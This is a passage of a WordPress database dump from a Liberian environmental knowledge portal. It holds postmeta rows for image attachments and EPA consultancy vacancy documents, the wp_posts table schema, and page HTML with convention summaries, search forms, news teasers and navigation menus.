ria.info/wp-content/uploads/2026/06/Final-National-Climate-Change-for-LMS-on-EWS-Final-ToR-28.05.26.docx'),(39687,5973,'_wp_attached_file','2026/06/Final-National-Climate-Change-for-LMS-on-EWS-Final-ToR-28.05.26.docx'),(39688,5973,'_wp_attachment_metadata','a:1:{s:8:\"filesize\";i:88003;}'),(39689,5975,'_edit_lock','1781718278:38'),(39690,5975,'_last_editor_used_jetpack','block-editor'),(39691,5976,'_wp_attached_file','2026/06/today-newssss.jpeg'),(39692,5976,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1018;s:6:\"height\";i:1600;s:4:\"file\";s:26:\"2026/06/today-newssss.jpeg\";s:8:\"filesize\";i:131517;s:5:\"sizes\";a:16:{s:6:\"medium\";a:5:{s:4:\"file\";s:26:\"today-newssss-191x300.jpeg\";s:5:\"width\";i:191;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:12235;}s:5:\"large\";a:5:{s:4:\"file\";s:27:\"today-newssss-652x1024.jpeg\";s:5:\"width\";i:652;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:80364;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:26:\"today-newssss-150x150.jpeg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:6132;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:27:\"today-newssss-768x1207.jpeg\";s:5:\"width\";i:768;s:6:\"height\";i:1207;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:106156;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:27:\"today-newssss-977x1536.jpeg\";s:5:\"width\";i:977;s:6:\"height\";i:1536;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:161110;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:26:\"today-newssss-370x265.jpeg\";s:5:\"width\";i:370;s:6:\"height\";i:265;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:18057;}s:12:\"kava-thumb-s\";a:5:{s:4:\"file\";s:25:\"today-newssss-150x85.jpeg\";s:5:\"width\";i:150;s:6:\"height\";i:85;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:4156;}s:14:\"kava-thumb-s-2\";a:5:{s:4:\"file\";s:26:\"today-newssss-230x230.jpeg\";s:5:\"width\";i:230;s:6:\"height\";i:230;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:11301;}s:12:\"kava-thumb-m\";a:5:{s:4:\"file\";s:26:\"today-newssss-400x400.jpeg\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:25662;}s:21:\"kava-thumb-m-vertical\";a:5:{s:4:\"file\";s:26:\"today-newssss-370x500.jpeg\";s:5:\"width\";i:370;s:6:\"height\";i:500;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:29119;}s:14:\"kava-thumb-m-2\";a:5:{s:4:\"file\";s:26:\"today-newssss-570x450.jpeg\";s:5:\"width\";i:570;s:6:\"height\";i:450;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:38499;}s:12:\"kava-thumb-l\";a:5:{s:4:\"file\";s:27:\"today-newssss-1018x650.jpeg\";s:5:\"width\";i:1018;s:6:\"height\";i:650;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:94772;}s:13:\"kava-thumb-xl\";a:5:{s:4:\"file\";s:28:\"today-newssss-1018x1080.jpeg\";s:5:\"width\";i:1018;s:6:\"height\";i:1080;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:141926;}s:18:\"kava-thumb-masonry\";a:5:{s:4:\"file\";s:26:\"today-newssss-600x943.jpeg\";s:5:\"width\";i:600;s:6:\"height\";i:943;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:69861;}s:18:\"kava-thumb-justify\";a:5:{s:4:\"file\";s:26:\"today-newssss-640x640.jpeg\";s:5:\"width\";i:640;s:6:\"height\";i:640;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:54737;}s:20:\"kava-thumb-justify-2\";a:5:{s:4:\"file\";s:27:\"today-newssss-1018x640.jpeg\";s:5:\"width\";i:1018;s:6:\"height\";i:640;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:84225;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(39696,5975,'_edit_last','38'),(39695,5975,'_thumbnail_id','5976'),(39724,5978,'_last_editor_used_jetpack','classic-editor'),(39699,5975,'kava_extra_enable_breadcrumbs','inherit'),(39700,5975,'post_formats',''),(39701,5975,'gallery_tab',''),(39702,5975,'kava_extra_gallery_images',''),(39703,5975,'link_tab',''),(39704,5975,'kava_extra_link',''),(39705,5975,'kava_extra_link_target','_blank'),(39706,5975,'quote_tab',''),(39707,5975,'kava_extra_quote_text',''),(39708,5975,'kava_extra_quote_cite',''),(39709,5975,'audio_tab',''),(39710,5975,'kava_extra_audio',''),(39711,5975,'kava_extra_audio_loop','false'),(39712,5975,'kava_extra_audio_autoplay','false'),(39713,5975,'kava_extra_audio_preload','false'),(39714,5975,'video_tab',''),(39715,5975,'kava_extra_video_type','library'),(39716,5975,'kava_extra_video_library',''),(39717,5975,'kava_extra_video_external',''),(39718,5975,'kava_extra_video_poster',''),(39719,5975,'kava_extra_video_width','770'),(39720,5975,'kava_extra_video_height','480'),(39721,5975,'kava_extra_video_loop','false'),(39722,5975,'kava_extra_video_autoplay','false'),(39723,5975,'kava_extra_video_preload','false'),(39725,5978,'_edit_lock','1781800110:38'),(39726,5978,'_edit_last','38'),(39727,5978,'_wp_page_template','default'),(39728,5978,'closed_date','2026-07-06'),(39729,5978,'owner','EPA'),(39730,5978,'vacancy_link','https://ekmsliberia.info/wp-content/uploads/2026/06/Final-National-Consultant-for-Community-Based-Coastal-Ecosystem-Monitoring-28.05.2026.docx'),(39731,5980,'_wp_attached_file','2026/06/Final-National-Consultant-for-Community-Based-Coastal-Ecosystem-Monitoring-28.05.2026.docx'),(39732,5980,'_wp_attachment_metadata','a:1:{s:8:\"filesize\";i:87984;}'),(39733,5982,'_last_editor_used_jetpack','classic-editor'),(39734,5982,'_edit_lock','1781802328:38'),(39735,5982,'_edit_last','38'),(39736,5982,'_wp_page_template','default'),(39737,5982,'closed_date','2026-07-06'),(39738,5982,'owner','EPA'),(39739,5982,'vacancy_link','https://ekmsliberia.info/wp-content/uploads/2026/06/Final-National-Sea-and-River-Defense-management-Spaecialist.docx'),(39740,5984,'_wp_attached_file','2026/06/Final-National-Sea-and-River-Defense-management-Spaecialist.docx'),(39741,5984,'_wp_attachment_metadata','a:1:{s:8:\"filesize\";i:64594;}'),(39742,5986,'_edit_lock','1781807644:38'),(39743,5986,'_last_editor_used_jetpack','block-editor'),(39744,5987,'_wp_attached_file','2026/06/today.jpeg'),(39745,5987,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1600;s:6:\"height\";i:1200;s:4:\"file\";s:18:\"2026/06/today.jpeg\";s:8:\"filesize\";i:323213;s:5:\"sizes\";a:16:{s:6:\"medium\";a:5:{s:4:\"file\";s:18:\"today-300x225.jpeg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:19966;}s:5:\"large\";a:5:{s:4:\"file\";s:19:\"today-1024x768.jpeg\";s:5:\"width\";i:1024;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:172145;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:18:\"today-150x150.jpeg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:7839;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:18:\"today-768x576.jpeg\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:103118;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:20:\"today-1536x1152.jpeg\";s:5:\"width\";i:1536;s:6:\"height\";i:1152;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:347092;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:18:\"today-370x265.jpeg\";s:5:\"width\";i:370;s:6:\"height\";i:265;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:28049;}s:12:\"kava-thumb-s\";a:5:{s:4:\"file\";s:17:\"today-150x85.jpeg\";s:5:\"width\";i:150;s:6:\"height\";i:85;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:5643;}s:14:\"kava-thumb-s-2\";a:5:{s:4:\"file\";s:18:\"today-230x230.jpeg\";s:5:\"width\";i:230;s:6:\"height\";i:230;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:15831;}s:12:\"kava-thumb-m\";a:5:{s:4:\"file\";s:18:\"today-400x400.jpeg\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:42182;}s:21:\"kava-thumb-m-vertical\";a:5:{s:4:\"file\";s:18:\"today-370x500.jpeg\";s:5:\"width\";i:370;s:6:\"height\";i:500;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:46104;}s:14:\"kava-thumb-m-2\";a:5:{s:4:\"file\";s:18:\"today-570x450.jpeg\";s:5:\"width\";i:570;s:6:\"height\";i:450;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:64588;}s:12:\"kava-thumb-l\";a:5:{s:4:\"file\";s:19:\"today-1170x650.jpeg\";s:5:\"width\";i:1170;s:6:\"height\";i:650;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:177997;}s:13:\"kava-thumb-xl\";a:5:{s:4:\"file\";s:20:\"today-1600x1080.jpeg\";s:5:\"width\";i:1600;s:6:\"height\";i:1080;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:394295;}s:18:\"kava-thumb-masonry\";a:5:{s:4:\"file\";s:18:\"today-600x450.jpeg\";s:5:\"width\";i:600;s:6:\"height\";i:450;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:67521;}s:18:\"kava-thumb-justify\";a:5:{s:4:\"file\";s:18:\"today-640x640.jpeg\";s:5:\"width\";i:640;s:6:\"height\";i:640;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:95049;}s:20:\"kava-thumb-justify-2\";a:5:{s:4:\"file\";s:19:\"today-1280x640.jpeg\";s:5:\"width\";i:1280;s:6:\"height\";i:640;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:187400;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(39749,5986,'_edit_last','38'),(39748,5986,'_thumbnail_id','5987'),(39752,5986,'kava_extra_enable_breadcrumbs','inherit'),(39753,5986,'post_formats',''),(39754,5986,'gallery_tab',''),(39755,5986,'kava_extra_gallery_images',''),(39756,5986,'link_tab',''),(39757,5986,'kava_extra_link',''),(39758,5986,'kava_extra_link_target','_blank'),(39759,5986,'quote_tab',''),(39760,5986,'kava_extra_quote_text',''),(39761,5986,'kava_extra_quote_cite',''),(39762,5986,'audio_tab',''),(39763,5986,'kava_extra_audio',''),(39764,5986,'kava_extra_audio_loop','false'),(39765,5986,'kava_extra_audio_autoplay','false'),(39766,5986,'kava_extra_audio_preload','false'),(39767,5986,'video_tab',''),(39768,5986,'kava_extra_video_type','library'),(39769,5986,'kava_extra_video_library',''),(39770,5986,'kava_extra_video_external',''),(39771,5986,'kava_extra_video_poster',''),(39772,5986,'kava_extra_video_width','770'),(39773,5986,'kava_extra_video_height','480'),(39774,5986,'kava_extra_video_loop','false'),(39775,5986,'kava_extra_video_autoplay','false'),(39776,5986,'kava_extra_video_preload','false');
/*!40000 ALTER TABLE `wp_postmeta` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_posts`
--

DROP TABLE IF EXISTS `wp_posts`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_posts` (
  `ID` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `post_author` bigint(20) unsigned NOT NULL DEFAULT '0',
  `post_date` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `post_date_gmt` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `post_content` longtext COLLATE utf8mb4_unicode_ci NOT NULL,
  `post_title` text COLLATE utf8mb4_unicode_ci NOT NULL,
  `post_excerpt` text COLLATE utf8mb4_unicode_ci NOT NULL,
  `post_status` varchar(20) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT 'publish',
  `comment_status` varchar(20) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT 'open',
  `ping_status` varchar(20) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT 'open',
  `post_password` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `post_name` varchar(200) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `to_ping` text COLLATE utf8mb4_unicode_ci NOT NULL,
  `pinged` text COLLATE utf8mb4_unicode_ci NOT NULL,
  `post_modified` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `post_modified_gmt` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `post_content_filtered` longtext COLLATE utf8mb4_unicode_ci NOT NULL,
  `post_parent` bigint(20) unsigned NOT NULL DEFAULT '0',
  `guid` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `menu_order` int(11) NOT NULL DEFAULT '0',
  `post_type` varchar(20) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT 'post',
  `post_mime_type` varchar(100) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `comment_count` bigint(20) NOT NULL DEFAULT '0',
  PRIMARY KEY (`ID`),
  KEY `post_name` (`post_name`(191)),
  KEY `type_status_date` (`post_type`,`post_status`,`post_date`,`ID`),
  KEY `post_parent` (`post_parent`),
  KEY `post_author` (`post_author`),
  KEY `type_status_author` (`post_type`,`post_status`,`post_author`)
) ENGINE=MyISAM AUTO_INCREMENT=5989 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_posts`
--

LOCK TABLES `wp_posts` WRITE;
/*!40000 ALTER TABLE `wp_posts` DISABLE KEYS */;
INSERT INTO `wp_posts` VALUES (9,1,'2017-08-28 21:21:12','2017-08-28 21:21:12','Convention on Biological Diversity CBD is dedicated to promoting sustainable development<a href=\"https://ekmsliberia.info/mea-resource/united-nations-convention-on-biological-diversity/\">Read More</a>Convention on Climate ChangeThe ultimate objective of the Convention is to stabilize greenhouse gas concentrations \"at a level that would prevent dangerous anthropogenic (human induced) interference with the climate system.\"<a href=\"https://ekmsliberia.info/mea-resource/united-nations-framework-convention-on-climate-change/\">Read More</a>Convention to Combat DesertificationA sole legally binding international agreement linking environment and development to sustainable land management.<a href=\"https://ekmsliberia.info/mea-resource/united-nations-convention-to-combat-desertification/\">Read More</a>				\n														Previous\n														Next\n<form method=\"get\" action=\"https://ekmsliberia.info/\" role=\"search\" target=\"\">\n						<input type=\"search\" placeholder=\"Search Knowledge Resources...\" value=\"\" name=\"s\" autocomplete=\"off\" />\n			<input type=\"hidden\" value=\"{&quot;search_source&quot;:[&quot;document&quot;,&quot;institution&quot;,&quot;mea_resource&quot;,&quot;project_resource&quot;,&quot;related_topic&quot;],&quot;search_taxonomy&quot;:&quot;resource_category&quot;,&quot;results_order_by&quot;:&quot;relevance&quot;,&quot;results_order&quot;:&quot;asc&quot;}\" name=\"jet_ajax_search_settings\" />\n							<input type=\"hidden\" value=\"document,institution,mea_resource,project_resource,related_topic\" name=\"post_type\" />\n		<select  name=\"jet_ajax_search_categories\" data-placeholder=\"Entire Resource\" id=\'jet_ajax_search_categories_f4a4a39\' class=\'jet-ajax-search__categories-select\' >\n	<option value=\'0\' selected=\'selected\'>Entire Resource</option>\n	<option value=\"231\">Acts</option>\n	<option value=\"248\">Article</option>\n	<option value=\"76\">Case Studies</option>\n	<option value=\"219\">Chemical</option>\n	<option value=\"78\">Conventions</option>\n	<option value=\"244\">Evaluation</option>\n	<option value=\"79\">Factsheets</option>\n	<option value=\"161\">Guidelines</option>\n	<option value=\"242\">Handbook</option>\n	<option value=\"82\">Leaflets</option>\n	<option value=\"84\">Newsletters</option>\n	<option value=\"85\">Policies</option>\n	<option value=\"225\">Presentations</option>\n	<option value=\"209\">Project Document</option>\n	<option value=\"86\">Reports</option>\n	<option value=\"178\">Research</option>\n	<option value=\"88\">Strategy and Action Plans</option>\n	<option value=\"243\">Survey</option>\n	<option value=\"89\">Toolkits</option>\n	<option value=\"217\">Water</option>\n</select>\n			<i>\n				<svg xmlns=\"http://www.w3.org/2000/svg\" shape-rendering=\"geometricPrecision\" text-rendering=\"geometricPrecision\" image-rendering=\"optimizeQuality\" fill-rule=\"evenodd\" clip-rule=\"evenodd\" viewBox=\"0 0 512 336.36\"><path fill-rule=\"nonzero\" d=\"M42.47.01 469.5 0C492.96 0 512 19.04 512 42.5c0 11.07-4.23 21.15-11.17 28.72L294.18 320.97c-14.93 18.06-41.7 20.58-59.76 5.65-1.8-1.49-3.46-3.12-4.97-4.83L10.43 70.39C-4.97 52.71-3.1 25.86 14.58 10.47 22.63 3.46 32.57.02 42.47.01z\"/></svg>\n			</i>	\n<button type=\"submit\" aria-label=\"search submit\"></button>\n</form>\n<button> Results</button>\n			<button>See all results</button>			\n			<h1>Select a Topic</h1>		\n			<svg width=\"24\" height=\"24\" viewBox=\"0 0 24 24\" fill=\"none\" xmlns=\"http://www.w3.org/2000/svg\"><path d=\"M14.625 5.3999L16.3 7.0749L11.35 12.0249L16.3 16.9749L14.625 18.6499L7.99999 12.0249L14.625 5.3999Z\" fill=\"#0F172A\"/></svg></i>\",\"nextArrow\":\"<i class=\"jet-arrow-next jet-blog-arrow\"><svg width=\"24\" height=\"24\" viewBox=\"0 0 24 24\" fill=\"none\" xmlns=\"http://www.w3.org/2000/svg\"><path d=\"M9.37501 18.6001L7.70001 16.9251L12.65 11.9751L7.70001 7.0251L9.37501 5.3501L16 11.9751L9.37501 18.6001Z\" fill=\"#0F172A\"/></svg></i>\",\"autoplay\":false,\"autoplaySpeed\":5000,\"rtl\":false}\' dir=\"ltr\">\n												Local Communities and Indigenous People																			\n		<a href=\"https://ekmsliberia.info/related-topic/local-communities-and-indigenous-people/\" aria-label=\"Local Communities and Indigenous People\"></a>\n												Land and Climate																			\n		<a href=\"https://ekmsliberia.info/related-topic/land-and-climate/\" aria-label=\"Land and Climate\"></a>\n												Forest Biodiversity																			\n		<a href=\"https://ekmsliberia.info/related-topic/forest-biodiversity/\" aria-label=\"Forest Biodiversity\"></a>\n												Inland Waters Biodiversity																			\n		<a href=\"https://ekmsliberia.info/related-topic/inland-waters-biodiversity/\" aria-label=\"Inland Waters Biodiversity\"></a>\n												Marine and Coastal Biodiversity																			\n		<a href=\"https://ekmsliberia.info/related-topic/marine-and-coastal-biodiversity/\" aria-label=\"Marine and Coastal Biodiversity\"></a>\n			<a href=\"https://ekmsliberia.info/related-topics/\" role=\"button\">\n						Explore All Topics\n					</a>\n			<h2>Explore by Institution</h2>		\n		<p>Explore Government and partner Institutions that have direct linkages with environmental policies and development.</p>		\n			<a href=\"https://ekmsliberia.info/institutions-resources/\" role=\"button\">\n						Explore By Insitution\n					</a>\n			<h2>Explore by Document</h2>		\n		<p>Explore the EKMS Documents Database.</p>		\n			<a href=\"https://ekmsliberia.info/document-library/\" role=\"button\">\n						Explore All Documents\n					</a>\n			<h1>Latest News & Blogs</h1>		\n	<a href=\"https://ekmsliberia.info/liberia-welcomes-four-chimpanzees-rescued-by-guinea-bissau-gol-fda-and-lcrp-provide-sanctuary-for-new-arrivals/\"><img src=\"https://ekmsliberia.info/wp-content/uploads/2022/09/FDA-1-370x265.jpg\" alt=\"Liberia Welcomes Four Chimpanzees Rescued by Guinea-Bissau - GoL, FDA, and LCRP Provide Sanctuary for New Arrivals\" loading=\"lazy\" width=\"370\" height=\"265\"></a><a href=\"https://ekmsliberia.info/category/news/\">News</a><h4><a href=\"https://ekmsliberia.info/liberia-welcomes-four-chimpanzees-rescued-by-guinea-bissau-gol-fda-and-lcrp-provide-sanctuary-for-new-arrivals/\">Liberia Welcomes Four Chimpanzees Rescued by Guinea-Bissau - GoL, FDA,...</a></h4>Authorities of the Forestry Development Authority (FDA) and Liberia Chimpanzee&hellip;\n	<a href=\"https://ekmsliberia.info/fda-partners-increase-public-awareness-to-fast-track-liberias-progress-on-redd/\"><img src=\"https://ekmsliberia.info/wp-content/uploads/2022/09/FDA-370x265.jpg\" alt=\"FDA &amp; Partners Increase Public Awareness to Fast-track Liberia’s Progress on REDD+\" loading=\"lazy\" width=\"370\" height=\"265\"></a><a href=\"https://ekmsliberia.info/category/news/\">News</a><h4><a href=\"https://ekmsliberia.info/fda-partners-increase-public-awareness-to-fast-track-liberias-progress-on-redd/\">FDA & Partners Increase Public Awareness to Fast-track Liberia’s Progress...</a></h4>The Forestry Development Authority (FDA) through the Liberia Forest Sector&hellip;\n	<a href=\"https://ekmsliberia.info/eu-funded-project-on-combating-wildlife-forest-crime-celebrates-achievements/\"><img src=\"https://ekmsliberia.info/wp-content/uploads/2022/09/fda-1-370x265.png\" alt=\"EU Funded Project on Combating Wildlife &amp; Forest Crime Celebrates Achievements\" loading=\"lazy\" width=\"370\" height=\"265\"></a><a href=\"https://ekmsliberia.info/category/news/\">News</a><h4><a href=\"https://ekmsliberia.info/eu-funded-project-on-combating-wildlife-forest-crime-celebrates-achievements/\">EU Funded Project on Combating Wildlife & Forest Crime Celebrates...</a></h4>The Managing Director of the Forestry Development Authority (FDA), Hon.&hellip;\n	<a href=\"https://ekmsliberia.info/ministry-of-agriculture-distributes-over-one-million-cocoa-seedlings-in-lofa/\"><img src=\"https://ekmsliberia.info/wp-content/uploads/2022/09/MOA-1-370x265.jpg\" alt=\"Ministry of Agriculture Distributes Over One Million Cocoa Seedlings in Lofa\" loading=\"lazy\" width=\"370\" height=\"265\"></a><a href=\"https://ekmsliberia.info/category/news/\">News</a><h4><a href=\"https://ekmsliberia.info/ministry-of-agriculture-distributes-over-one-million-cocoa-seedlings-in-lofa/\">Ministry of Agriculture Distributes Over One Million Cocoa Seedlings in...</a></h4>The Ministry of Agriculture, through its the Tree Crops Extension&hellip;\n			<a href=\"https://ekmsliberia.info/news-and-blogs/\" role=\"button\">\n						Read All News & Blogs\n					</a>','Home','','publish','closed','closed','','home','','','2022-10-18 09:08:38','2022-10-18 09:08:38','',0,'https://medical.oceanwp.org/?page_id=9',0,'page','',0),(14,1,'2019-11-08 05:10:48','2019-11-08 05:10:48','','slide_ccd','','inherit','open','closed','','slide_ccd','','','2019-11-08 05:10:48','2019-11-08 05:10:48','',0,'https://ekmsliberia.info/wp-content/uploads/2019/11/slide_ccd.jpg',0,'attachment','image/jpeg',0),(16,1,'2019-11-08 05:12:56','2019-11-08 05:12:56','','ekms','','inherit','open','closed','','ekms','','','2019-11-08 05:12:56','2019-11-08 05:12:56','',0,'https://ekmsliberia.info/wp-content/uploads/2019/11/ekms.png',0,'attachment','image/png',0),(17,1,'2019-11-08 05:13:06','2019-11-08 05:13:06','https://ekmsliberia.info/wp-content/uploads/2019/11/cropped-ekms.png','cropped-ekms.png','','inherit','open','closed','','cropped-ekms-png','','','2019-11-08 05:13:06','2019-11-08 05:13:06','',0,'https://ekmsliberia.info/wp-content/uploads/2019/11/cropped-ekms.png',0,'attachment','image/png',0),(20,1,'2019-11-08 05:16:11','2019-11-08 05:16:11','','Logo','','inherit','open','closed','','logo','','','2019-11-08 05:16:11','2019-11-08 05:16:11','',0,'https://ekmsliberia.info/wp-content/uploads/2019/11/Logo.png',0,'attachment','image/png',0),(30,1,'2017-08-29 01:15:58','2017-08-29 01:15:58','<a href=\"https://ekmsliberia.info/\" rel=\"home\"><img width=\"293\" height=\"300\" src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/seal.png\" alt=\"Official Website of the Environmental Knowledge Management System\" /></a>\n	<!-- #site-logo-inner -->\n<!-- #site-logo -->\n			<h2>Environmental Knowledge<br> Management System</h2>		\n		Join Us to help grow <br>the EKMS Community		\n			<a href=\"https://ekms-liberia.mn.co/\" target=\"_blank\" role=\"button\" rel=\"noopener noreferrer\">\n						Sign up, It\'s Free!\n					</a>\n			<nav id=\"site-navigation\" itemscope=\"itemscope\" itemtype=\"http://schema.org/SiteNavigationElement\">\n				<ul id=\"menu-main_menu\"><li id=\"menu-item-404\"><a href=\"https://ekmsliberia.info/\">Home</a></li><li id=\"menu-item-127\"><a>Knowledge Resources </a>\n<ul>\n	<li id=\"menu-item-125\"><a href=\"https://ekmsliberia.info/multilateral-environmental-agreements/\">Multilateral Environmental Agreements</a></li>	<li id=\"menu-item-117\"><a href=\"https://ekmsliberia.info/related-topics/\">Explore All Topics</a></li>	<li id=\"menu-item-123\"><a href=\"https://ekmsliberia.info/institutions-resources/\">Explore All Institutions</a></li>	<li id=\"menu-item-120\"><a href=\"https://ekmsliberia.info/documents-database/\">Explore All Documents</a></li></ul>\n</li><li id=\"menu-item-114\"><a href=\"https://ekmsliberia.info/about/\">About EKMS</a></li><li id=\"menu-item-118\"><a href=\"https://ekmsliberia.info/country-profile/\">Country Profile</a></li><li id=\"menu-item-129\"><a>Media &#038; Tools </a>\n<ul>\n	<li id=\"menu-item-115\"><a href=\"https://ekmsliberia.info/news-and-blogs/\">News &#038; Blogs</a></li>	<li id=\"menu-item-126\"><a href=\"https://ekmsliberia.info/vacancy/\">EKMS Bulletins</a></li>	<li id=\"menu-item-1842\"><a href=\"https://ekmsliberia.info/frequently-asked-questions/\">FAQ</a></li>	<li id=\"menu-item-124\"><a href=\"https://ekmsliberia.info/maps/\">Maps</a></li>	<li id=\"menu-item-2509\"><a href=\"https://ekmsliberia.info/join-the-community/\">Join the Community</a></li>	<li id=\"menu-item-2596\"><a target=\"_blank\" rel=\"noopener noreferrer\">Startup Online Meetings</a></li>	<li id=\"menu-item-2746\"><a target=\"_blank\" href=\"https://securedrive.ekmsliberia.info/\" rel=\"noopener noreferrer\">EKMS CloudDrive</a></li></ul>\n</li><li id=\"menu-item-116\"><a href=\"https://ekmsliberia.info/contact-us/\">Contact Us</a></li><li id=\"menu-item-2921\"><a target=\"_blank\" href=\"https://ekmsliberia.info/newsletter/\" rel=\"noopener noreferrer\">Subscribe</a></li><li><a href=\"#\"></a></li></ul>\n	<form method=\"get\" action=\"https://ekmsliberia.info/\">\n		<input type=\"search\" name=\"s\" autocomplete=\"off\" value=\"\" placeholder=\"Type then hit enter to search...\" />\n					</form>\n<!-- #searchform-header-replace -->\n			</nav><!-- #site-navigation -->\n					<!-- #site-navigation-wrap -->\n		<a href=\"#\">\n							Menu\n									Close\n						</a>\n	<!-- #oceanwp-mobile-menu-navbar -->\n	<nav itemscope=\"itemscope\" itemtype=\"http://schema.org/SiteNavigationElement\">\n		<ul id=\"menu-main_menu-1\"><li><a href=\"https://ekmsliberia.info/\">Home</a></li>\n<li><a>Knowledge Resources</a>\n<ul>\n	<li><a href=\"https://ekmsliberia.info/multilateral-environmental-agreements/\">Multilateral Environmental Agreements</a></li>\n	<li><a href=\"https://ekmsliberia.info/related-topics/\">Explore All Topics</a></li>\n	<li><a href=\"https://ekmsliberia.info/institutions-resources/\">Explore All Institutions</a></li>\n	<li><a href=\"https://ekmsliberia.info/documents-database/\">Explore All Documents</a></li>\n</ul>\n</li>\n<li><a href=\"https://ekmsliberia.info/about/\">About EKMS</a></li>\n<li><a href=\"https://ekmsliberia.info/country-profile/\">Country Profile</a></li>\n<li><a>Media &#038; Tools</a>\n<ul>\n	<li><a href=\"https://ekmsliberia.info/news-and-blogs/\">News &#038; Blogs</a></li>\n	<li><a href=\"https://ekmsliberia.info/vacancy/\">EKMS Bulletins</a></li>\n	<li><a href=\"https://ekmsliberia.info/frequently-asked-questions/\">FAQ</a></li>\n	<li><a href=\"https://ekmsliberia.info/maps/\">Maps</a></li>\n	<li><a href=\"https://ekmsliberia.info/join-the-community/\">Join the Community</a></li>\n	<li><a target=\"_blank\" rel=\"noopener noreferrer\">Startup Online Meetings</a></li>\n	<li><a target=\"_blank\" rel=\"noopener noreferrer\" 